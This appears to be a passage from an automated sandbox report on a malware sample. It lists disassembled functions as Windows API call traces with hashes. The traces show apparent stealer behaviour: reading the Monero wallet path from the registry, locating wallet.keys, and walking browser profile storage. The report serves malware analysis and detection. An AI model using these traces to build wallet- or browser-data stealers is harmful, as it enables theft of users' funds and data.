                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b849d4e16315912e2199e66a092aa01812715b1bdb403ff97c940943fe7ba157
                        • Instruction ID: aa09a36178c42adde1c3f41659c9f6bec51303e8dc26fbc16d5d8d9b49be767f
                        • Opcode Fuzzy Hash: b849d4e16315912e2199e66a092aa01812715b1bdb403ff97c940943fe7ba157
                        • Instruction Fuzzy Hash: 0251F6B39186149FD748BE38EC8667AF7E8EF54760F16492DE9C9D3340E631A940C782
                        Function 00B9658D Relevance: .1, Instructions: 145COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4d075aa36458a29589be2f712c0231b1c1db83ea0be58648aedf7bf51a354a9
                        • Instruction ID: dd168b01d33e899eba91bd82140912fecd20480dc23092d635fcdc6e2788d798
                        • Opcode Fuzzy Hash: a4d075aa36458a29589be2f712c0231b1c1db83ea0be58648aedf7bf51a354a9
                        • Instruction Fuzzy Hash: EF4106F3E281209BE3189A2CEC9576676D9DB54710F2B463DDF89A3780E87D5C0086D6
                        Function 00BBE3E8 Relevance: .1, Instructions: 145COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd3a11421d302ec22fd15ef8d49da3c680f3d55e8b900e19bf3296a1e8bdc474
                        • Instruction ID: 22ebb8f33826c0fe99acf17054830b854e56ca9d949aacaa20a6cf7237a2eba4
                        • Opcode Fuzzy Hash: dd3a11421d302ec22fd15ef8d49da3c680f3d55e8b900e19bf3296a1e8bdc474
                        • Instruction Fuzzy Hash: 6A41FAF3A082109BE3186F2DEC5577AB7E5EB50310F0A493DEAC5C7780E67658448787
                        Function 009185B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00918636
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091866D
                        • lstrcpy.KERNEL32(?,00000000), ref: 009186AA
                        • StrStrA.SHLWAPI(?,015EFEF8), ref: 009186CF
                        • lstrcpyn.KERNEL32(00B393D0,?,00000000), ref: 009186EE
                        • lstrlen.KERNEL32(?), ref: 00918701
                        • wsprintfA.USER32 ref: 00918711
                        • lstrcpy.KERNEL32(?,?), ref: 00918727
                        • StrStrA.SHLWAPI(?,015EFF58), ref: 00918754
                        • lstrcpy.KERNEL32(?,00B393D0), ref: 009187B4
                        • StrStrA.SHLWAPI(?,015F00C0), ref: 009187E1
                        • lstrcpyn.KERNEL32(00B393D0,?,00000000), ref: 00918800
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                        • String ID: %s%s
                        • API String ID: 2672039231-3252725368
                        • Opcode ID: f884888475742782953aa92ad94ec197c52d1646d641bc46806dfdd83d876d95
                        • Instruction ID: 481e1b720bbf66db77e069c8f303e2e65b84b35fb1f79d49537aa3172ac38c81
                        • Opcode Fuzzy Hash: f884888475742782953aa92ad94ec197c52d1646d641bc46806dfdd83d876d95
                        • Instruction Fuzzy Hash: A0F16E72A00618AFCB11DB68DD48ADE77B9EF88700F244599F909E3250DF70AE45DFA1
                        Function 00901F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901F9F
                        • lstrlen.KERNEL32(015E88C8), ref: 00901FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00901FE3
                        • lstrlen.KERNEL32(00931794), ref: 00901FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090200E
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00902042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090204D
                        • lstrlen.KERNEL32(00931794), ref: 00902058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902075
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00902081
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009020AC
                        • lstrlen.KERNEL32(?), ref: 009020E4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902104
                        • lstrcat.KERNEL32(00000000,?), ref: 00902112
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902139
                        • lstrlen.KERNEL32(00931794), ref: 0090214B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090216B
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00902177
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090219D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009021A8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009021D4
                        • lstrlen.KERNEL32(?), ref: 009021EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090220A
                        • lstrcat.KERNEL32(00000000,?), ref: 00902218
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902242
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090227F
                        • lstrlen.KERNEL32(015EE368), ref: 0090228D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009022B1
                        • lstrcat.KERNEL32(00000000,015EE368), ref: 009022B9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009022F7
                        • lstrcat.KERNEL32(00000000), ref: 00902304
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090232D
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00902356
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902382
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009023BF
                        • DeleteFileA.KERNEL32(00000000), ref: 009023F7
                        • FindNextFileA.KERNEL32(00000000,?), ref: 00902444
                        • FindClose.KERNEL32(00000000), ref: 00902453
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                        • String ID:
                        • API String ID: 2857443207-0
                        • Opcode ID: d088a985748610f927224275b79b3d1b2da3d7481cc121743504dbfe61a2e537
                        • Instruction ID: 184eaf95b59ee6ecb175e18e48ea12a8427d6ca1aeeab915e687612fd7a305ae
                        • Opcode Fuzzy Hash: d088a985748610f927224275b79b3d1b2da3d7481cc121743504dbfe61a2e537
                        • Instruction Fuzzy Hash: 7EE13D71A1161A9FCB21EFA8DE8DBAE77B9AF84700F144464F805A7291DF34DD05CBA0
                        Function 00916410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916445
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916480
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009164AA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009164E1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916506
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091650E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916537
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FolderPathlstrcat
                        • String ID: \..\
                        • API String ID: 2938889746-4220915743
                        • Opcode ID: e6189249b4ae7cbeb426315abbb6646f17a70cd3d6857e0520daf802438ccfa9
                        • Instruction ID: eaef2786ccbe0c07e090f45d0388e1786af6c002f0b45ec4a9a8f5dfaa97d81b
                        • Opcode Fuzzy Hash: e6189249b4ae7cbeb426315abbb6646f17a70cd3d6857e0520daf802438ccfa9
                        • Instruction Fuzzy Hash: D7F17B70F1161A9FCB21AF68D949BEE77B9AF84300F144168B856E7291DB34DC85CB90
                        Function 00914370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009143A3
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009143D6
                        • lstrcpy.KERNEL32(00000000,?), ref: 009143FE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914409
                        • lstrlen.KERNEL32(\storage\default\), ref: 00914414
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914431
                        • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0091443D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914466
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914471
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914498
                        • lstrcpy.KERNEL32(00000000,?), ref: 009144D7
                        • lstrcat.KERNEL32(00000000,?), ref: 009144DF
                        • lstrlen.KERNEL32(00931794), ref: 009144EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914507
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00914513
                        • lstrlen.KERNEL32(.metadata-v2), ref: 0091451E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091453B
                        • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00914547
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091456E
                        • lstrcpy.KERNEL32(00000000,?), ref: 009145A0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 009145A7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914601
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091462A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914653
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091467B
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009146AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                        • String ID: .metadata-v2$\storage\default\
                        • API String ID: 1033685851-762053450
                        • Opcode ID: 82331c6a4cc7375afb32c69a2cd00c4592fe5e3b9efdeb41fb0feeab70a4c135
                        • Instruction ID: 1101ebd9f251bbcb8578e49388dfc8df614d1438c432c9773d509e139d4dba7f
                        • Opcode Fuzzy Hash: 82331c6a4cc7375afb32c69a2cd00c4592fe5e3b9efdeb41fb0feeab70a4c135
                        • Instruction Fuzzy Hash: 2FB18E71B1161A9FCB21EF78DE89AEE77A9AF88304F140124F856E7291DF34DC458B90
                        Function 009157A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009157D5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00915804
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915835
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091585D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00915868
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915890
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009158C8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009158D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009158F8
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091592E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915956
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00915961
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915988
                        • lstrlen.KERNEL32(00931794), ref: 0091599A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009159B9
                        • lstrcat.KERNEL32(00000000,00931794), ref: 009159C5
                        • lstrlen.KERNEL32(015EE290), ref: 009159D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009159F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00915A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915A2C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915A58
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00915A5F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915AB7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915B2D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915B56
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915B89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915BB5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00915BEF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915C4C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915C70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2428362635-0
                        • Opcode ID: 81164ffac961a172e2450646be7ee220a32ce77974106a17d943637e45a02fb0
                        • Instruction ID: 0c7894766317d27a81030a7ac5f4cbe570be5ffcfa7d390d76af66c82cfa5fa3
                        • Opcode Fuzzy Hash: 81164ffac961a172e2450646be7ee220a32ce77974106a17d943637e45a02fb0
                        • Instruction Fuzzy Hash: 4802A171B11A09DFCB21EF68D989AEE77B9AF84300F164168F845A7290DF34DD85CB90
                        Function 00901190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00901120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00901135
                          • Part of subcall function 00901120: RtlAllocateHeap.NTDLL(00000000), ref: 0090113C
                          • Part of subcall function 00901120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00901159
                          • Part of subcall function 00901120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00901173
                          • Part of subcall function 00901120: RegCloseKey.ADVAPI32(?), ref: 0090117D
                        • lstrcat.KERNEL32(?,00000000), ref: 009011C0
                        • lstrlen.KERNEL32(?), ref: 009011CD
                        • lstrcat.KERNEL32(?,.keys), ref: 009011E8
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090121F
                        • lstrlen.KERNEL32(015E88C8), ref: 0090122D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901251
                        • lstrcat.KERNEL32(00000000,015E88C8), ref: 00901259
                        • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00901264
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901288
                        • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00901294
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009012BA
